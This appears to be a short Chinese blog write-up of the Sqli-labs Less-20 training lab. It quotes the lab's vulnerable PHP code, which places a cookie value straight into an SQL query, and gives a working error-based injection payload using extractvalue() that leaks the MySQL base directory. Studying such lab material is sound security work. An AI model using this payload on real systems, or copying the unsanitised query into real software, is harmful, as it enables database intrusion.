Sqli-labs Less-20 cookie注入 extractvalue()报错注入

从源代码中我们可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。

关键代码

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
die('Issue with your mysql: ' . mysql_error());

修改登录成功后的请求,在Cookie: uname=admin后面加一个',重放该请求

从上图可以看出,报SQL语法错误,说明cookie位置存在SQL注入漏洞。

 

如下图所示,我们修改cookie为

uname=admin' and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

可以看到报错了,我们得到了mysql 的路径。

其他的注入方法自行测试呦!

 

参考:https://www.cnblogs.com/lcamry/p/5763024.html

posted @ 2020-04-09 22:04  zhengna  阅读(484)  评论(0编辑  收藏  举报